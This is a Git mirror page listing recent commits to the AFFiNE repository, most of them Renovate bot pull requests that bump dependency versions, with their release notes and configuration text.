mirror of
https://github.com/toeverything/AFFiNE.git
synced 2026-02-04 00:28:33 +00:00
canary
1745 Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
renovate[bot]
|
de29e8300a |
chore: bump up @types/uuid version to v11 (#14364)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | @​types/uuid | [`^10.0.0` → `^11.0.0`](https://renovatebot.com/diffs/npm/@types%2fuuid/10.0.0/11.0.0) |  |  | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi45Mi4xIiwidXBkYXRlZEluVmVyIjoiNDIuOTIuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
renovate[bot]
|
12f0a9ae62 |
chore: bump up @types/multer version to v2 (#14353)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@types/multer](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/multer) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/multer)) | [`^1` → `^2.0.0`](https://renovatebot.com/diffs/npm/@types%2fmulter/1.4.12/2.0.0) |  |  | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi45Mi4xIiwidXBkYXRlZEluVmVyIjoiNDIuOTIuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |
||
|
renovate[bot]
|
73d4da192d |
chore: bump up @types/sinon version to v21 (#14361)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@types/sinon](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/sinon) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/sinon)) | [`^17.0.3` → `^21.0.0`](https://renovatebot.com/diffs/npm/@types%2fsinon/17.0.4/21.0.0) |  |  | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi45Mi4xIiwidXBkYXRlZEluVmVyIjoiNDIuOTIuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |
||
|
renovate[bot]
|
0b648f8613 |
chore: bump up @types/nodemailer version to v7 (#14354)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@types/nodemailer](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/nodemailer) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/nodemailer)) | [`^6.4.17` → `^7.0.0`](https://renovatebot.com/diffs/npm/@types%2fnodemailer/6.4.17/7.0.9) |  |  | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi45Mi4xIiwidXBkYXRlZEluVmVyIjoiNDIuOTIuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |
||
|
DarkSky
|
516d72e83f | fix: lint & lockfile | ||
|
renovate[bot]
|
7040fe3e75 |
chore: bump up @sentry/webpack-plugin version to v4 (#14352)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@sentry/webpack-plugin](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/tree/main/packages/webpack-plugin) ([source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins)) | [`^3.0.0` → `^4.0.0`](https://renovatebot.com/diffs/npm/@sentry%2fwebpack-plugin/3.6.1/4.8.0) |  |  | --- ### Release Notes <details> <summary>getsentry/sentry-javascript-bundler-plugins (@​sentry/webpack-plugin)</summary> ### [`v4.8.0`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#480) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.7.0...4.8.0) ##### New Features ✨ - Inject component annotations into HTML elements rather than React components by [@​timfish](https://redirect.github.com/timfish) in [#​851](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/851) - Combine injection snippets by [@​timfish](https://redirect.github.com/timfish) in [#​853](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/853) - Use Rolldown native `MagicString` by [@​timfish](https://redirect.github.com/timfish) in [#​846](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/846) ### [`v4.7.0`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#470) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.6.2...4.7.0) - docs: Add RELEASE.md to document release process ([#​834](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/834)) - feat: Combine injection plugins ([#​844](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/844)) - fix(plugin-manager): Enable "rejectOnError" in debug ([#​837](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/837)) - fix(plugin-manager): Respect `sourcemap.ignore` values for injecting debugIDs ([#​836](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/836)) - fix(vite): Skip HTML injection for MPA but keep it for SPA ([#​843](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/843)) <details> <summary> <strong>Internal Changes</strong> </summary> - chore: Use pull\_request\_target for changelog preview ([#​842](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/842)) - ci(release): Switch from action-prepare-release to Craft ([#​831](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/831)) - test: Ensure Debug IDs match ([#​840](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/840)) </details> ### [`v4.6.2`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#462) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.6.1...4.6.2) - fix(vite): Ensure sentryVitePlugin always returns an array of plugins ([#​832](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/832)) - fix(vite): Skip code injection for HTML facade chunks ([#​830](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/830)) - fix(rollup): Prevent double-injection of debug ID ([#​827](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/827)) - fix(esbuild): fix debug ID injection when moduleMetadata or applicationKey is set ([#​828](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/828)) ### [`v4.6.1`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#461) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.6.0...4.6.1) - chore(deps): Update glob to 10.5.0 ([#​823](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/823)) <details> <summary> <strong>Internal Changes</strong> </summary> - chore(core): Log release output ([#​821](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/821)) </details> ### [`v4.6.0`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#460) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.5.0...4.6.0) - fix(core): Stop awaiting build start telemetry to avoid breaking module federation builds ([#​818](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/818)) - feat(core): Bump [@​sentry/cli](https://redirect.github.com/sentry/cli) from 2.51.0 to 2.57.0 ([#​819](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/819)) ### [`v4.5.0`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#450) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.4.0...4.5.0) - docs: added info on debug flag value precedence ([#​811](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/811)) - feat: add debug statements after sourcemap uploads ([#​812](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/812)) - feat(core): Allow multi-project sourcemaps upload ([#​813](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/813)) - fix: propagate the debug option to the cli ([#​810](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/810)) ### [`v4.4.0`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#440) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.3.0...4.4.0) - feat(core): Explicitly allow `undefined` as value for `authToken` option ([#​805](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/805)) - fix(core): Strip query strings from asset paths ([#​806](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/806)) Work in this release was contributed by [@​aiktb](https://redirect.github.com/aiktb). Thank you for your contribution! ### [`v4.3.0`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#430) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.2.0...4.3.0) - feat(core): Extend deploy option to allow opting out of automatic deploy creation ([#​801](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/801)) - feat(core): No asset globbing for direct upload ([#​800](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/800)) ### [`v4.2.0`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#420) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.1.1...4.2.0) - feat(core): Add `prepareArtifacts` option for uploading sourcemaps ([#​794](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/794)) - perf: use premove for build clean ([#​792](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/792)) - fix(core): Forward headers option to sentry-cli ([#​797](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/797)) Work in this release contributed by [@​liAmirali](https://redirect.github.com/liAmirali). Thank you for your contribution! ### [`v4.1.1`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#411) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.1.0...4.1.1) - fix(react-native): Enhance fragment detection for indirect references ([#​767](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/767)) ### [`v4.1.0`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#410) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.0.2...4.1.0) - feat(deps): Bump [@​sentry/cli](https://redirect.github.com/sentry/cli) to 2.51.0 [#​786](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/786) - feat(core): Add flag for disabling sourcemaps upload [#​785](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/785) - fix(debugId): Add guards for injected code to avoid errors [#​783](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/783) - docs(options): Improve JSDoc for options [#​781](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/781) - feat(core): Expose method for injecting debug Ids from plugin manager [#​784](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/784) ### [`v4.0.2`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#402) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.0.1...4.0.2) - fix(core): Make `moduleMetadata` injection snippet ES5-compliant ([#​774](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/774)) ### [`v4.0.1`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#401) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.0.0...4.0.1) - fix(core): Make plugin inject ES5-friendly code ([#​770](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/770)) - fix(core): Use `renderChunk` for release injection for Rollup/Rolldown/Vite ([#​761](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/761)) Work in this release was contributed by [@​grushetsky](https://redirect.github.com/grushetsky). Thank you for your contribution! ### [`v4.0.0`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#400) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/3.6.1...4.0.0) ##### Breaking Changes - (Type change) Vite plugin now returns `VitePlugin` type instead of `any` - Deprecated function `getBuildInformation` has been removed ##### List of Changes - feat(core)!: Remove `getBuildInformation` export ([#​765](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/765)) - feat(vite)!: Update return type of vite plugin ([#​728](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/728)) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi45Mi4xIiwidXBkYXRlZEluVmVyIjoiNDIuOTIuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
renovate[bot]
|
a8211b2e00 |
chore: bump up @googleapis/androidpublisher version to v35 (#14349)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@googleapis/androidpublisher](https://redirect.github.com/googleapis/google-api-nodejs-client) | [`^31.0.0` → `^35.0.0`](https://renovatebot.com/diffs/npm/@googleapis%2fandroidpublisher/31.0.0/35.1.1) |  |  | --- ### Release Notes <details> <summary>googleapis/google-api-nodejs-client (@​googleapis/androidpublisher)</summary> ### [`v35.1.0`](https://redirect.github.com/googleapis/google-api-nodejs-client/blob/HEAD/CHANGELOG.md#13510-2024-04-30) ##### Features - add API version to request ([b0fe3c6]( |
||
|
renovate[bot]
|
cce6122a63 |
chore: bump up @sentry/esbuild-plugin version to v4 (#14350)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@sentry/esbuild-plugin](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/tree/main/packages/esbuild-plugin) ([source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins)) | [`^3.0.0` → `^4.0.0`](https://renovatebot.com/diffs/npm/@sentry%2fesbuild-plugin/3.6.1/4.8.0) |  |  | --- ### Release Notes <details> <summary>getsentry/sentry-javascript-bundler-plugins (@​sentry/esbuild-plugin)</summary> ### [`v4.8.0`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#480) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.7.0...4.8.0) ##### New Features ✨ - Inject component annotations into HTML elements rather than React components by [@​timfish](https://redirect.github.com/timfish) in [#​851](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/851) - Combine injection snippets by [@​timfish](https://redirect.github.com/timfish) in [#​853](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/853) - Use Rolldown native `MagicString` by [@​timfish](https://redirect.github.com/timfish) in [#​846](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/846) ### [`v4.7.0`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#470) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.6.2...4.7.0) - docs: Add RELEASE.md to document release process ([#​834](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/834)) - feat: Combine injection plugins ([#​844](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/844)) - fix(plugin-manager): Enable "rejectOnError" in debug ([#​837](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/837)) - fix(plugin-manager): Respect `sourcemap.ignore` values for injecting debugIDs ([#​836](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/836)) - fix(vite): Skip HTML injection for MPA but keep it for SPA ([#​843](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/843)) <details> <summary> <strong>Internal Changes</strong> </summary> - chore: Use pull\_request\_target for changelog preview ([#​842](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/842)) - ci(release): Switch from action-prepare-release to Craft ([#​831](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/831)) - test: Ensure Debug IDs match ([#​840](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/840)) </details> ### [`v4.6.2`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#462) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.6.1...4.6.2) - fix(vite): Ensure sentryVitePlugin always returns an array of plugins ([#​832](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/832)) - fix(vite): Skip code injection for HTML facade chunks ([#​830](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/830)) - fix(rollup): Prevent double-injection of debug ID ([#​827](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/827)) - fix(esbuild): fix debug ID injection when moduleMetadata or applicationKey is set ([#​828](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/828)) ### [`v4.6.1`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#461) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.6.0...4.6.1) - chore(deps): Update glob to 10.5.0 ([#​823](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/823)) <details> <summary> <strong>Internal Changes</strong> </summary> - chore(core): Log release output ([#​821](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/821)) </details> ### [`v4.6.0`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#460) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.5.0...4.6.0) - fix(core): Stop awaiting build start telemetry to avoid breaking module federation builds ([#​818](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/818)) - feat(core): Bump [@​sentry/cli](https://redirect.github.com/sentry/cli) from 2.51.0 to 2.57.0 ([#​819](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/819)) ### [`v4.5.0`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#450) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.4.0...4.5.0) - docs: added info on debug flag value precedence ([#​811](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/811)) - feat: add debug statements after sourcemap uploads ([#​812](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/812)) - feat(core): Allow multi-project sourcemaps upload ([#​813](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/813)) - fix: propagate the debug option to the cli ([#​810](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/810)) ### [`v4.4.0`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#440) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.3.0...4.4.0) - feat(core): Explicitly allow `undefined` as value for `authToken` option ([#​805](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/805)) - fix(core): Strip query strings from asset paths ([#​806](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/806)) Work in this release was contributed by [@​aiktb](https://redirect.github.com/aiktb). Thank you for your contribution! ### [`v4.3.0`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#430) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.2.0...4.3.0) - feat(core): Extend deploy option to allow opting out of automatic deploy creation ([#​801](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/801)) - feat(core): No asset globbing for direct upload ([#​800](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/800)) ### [`v4.2.0`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#420) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.1.1...4.2.0) - feat(core): Add `prepareArtifacts` option for uploading sourcemaps ([#​794](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/794)) - perf: use premove for build clean ([#​792](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/792)) - fix(core): Forward headers option to sentry-cli ([#​797](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/797)) Work in this release contributed by [@​liAmirali](https://redirect.github.com/liAmirali). Thank you for your contribution! ### [`v4.1.1`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#411) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.1.0...4.1.1) - fix(react-native): Enhance fragment detection for indirect references ([#​767](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/767)) ### [`v4.1.0`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#410) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.0.2...4.1.0) - feat(deps): Bump [@​sentry/cli](https://redirect.github.com/sentry/cli) to 2.51.0 [#​786](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/786) - feat(core): Add flag for disabling sourcemaps upload [#​785](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/785) - fix(debugId): Add guards for injected code to avoid errors [#​783](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/783) - docs(options): Improve JSDoc for options [#​781](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/781) - feat(core): Expose method for injecting debug Ids from plugin manager [#​784](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/784) ### [`v4.0.2`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#402) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.0.1...4.0.2) - fix(core): Make `moduleMetadata` injection snippet ES5-compliant ([#​774](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/774)) ### [`v4.0.1`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#401) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/4.0.0...4.0.1) - fix(core): Make plugin inject ES5-friendly code ([#​770](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/770)) - fix(core): Use `renderChunk` for release injection for Rollup/Rolldown/Vite ([#​761](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/761)) Work in this release was contributed by [@​grushetsky](https://redirect.github.com/grushetsky). Thank you for your contribution! ### [`v4.0.0`](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/blob/HEAD/CHANGELOG.md#400) [Compare Source](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/compare/3.6.1...4.0.0) ##### Breaking Changes - (Type change) Vite plugin now returns `VitePlugin` type instead of `any` - Deprecated function `getBuildInformation` has been removed ##### List of Changes - feat(core)!: Remove `getBuildInformation` export ([#​765](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/765)) - feat(vite)!: Update return type of vite plugin ([#​728](https://redirect.github.com/getsentry/sentry-javascript-bundler-plugins/pull/728)) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi45Mi4xIiwidXBkYXRlZEluVmVyIjoiNDIuOTIuMSIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
renovate[bot]
|
40a2518ff9 |
chore: bump up @chromatic-com/storybook version to v5 (#14347)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@chromatic-com/storybook](https://redirect.github.com/chromaui/addon-visual-tests) | [`^4.1.3` → `^5.0.0`](https://renovatebot.com/diffs/npm/@chromatic-com%2fstorybook/4.1.3/5.0.0) |  |  | --- ### Release Notes <details> <summary>chromaui/addon-visual-tests (@​chromatic-com/storybook)</summary> ### [`v5.0.0`](https://redirect.github.com/chromaui/addon-visual-tests/releases/tag/v5.0.0) [Compare Source](https://redirect.github.com/chromaui/addon-visual-tests/compare/v4.1.3...v5.0.0) ##### 💥 Breaking Change - Upgrade to Storybook 10.1 [#​396](https://redirect.github.com/chromaui/addon-visual-tests/pull/396) ([@​ghengeveld](https://redirect.github.com/ghengeveld)) ##### 🐛 Bug Fix - Update npm version and add pull-requests permission for trusted publishing [#​403](https://redirect.github.com/chromaui/addon-visual-tests/pull/403) ([@​ghengeveld](https://redirect.github.com/ghengeveld)) - Update release workflow to use npm trusted publishing [#​402](https://redirect.github.com/chromaui/addon-visual-tests/pull/402) ([@​ghengeveld](https://redirect.github.com/ghengeveld)) - Fix: Update broken and outdated links in the addon [#​397](https://redirect.github.com/chromaui/addon-visual-tests/pull/397) 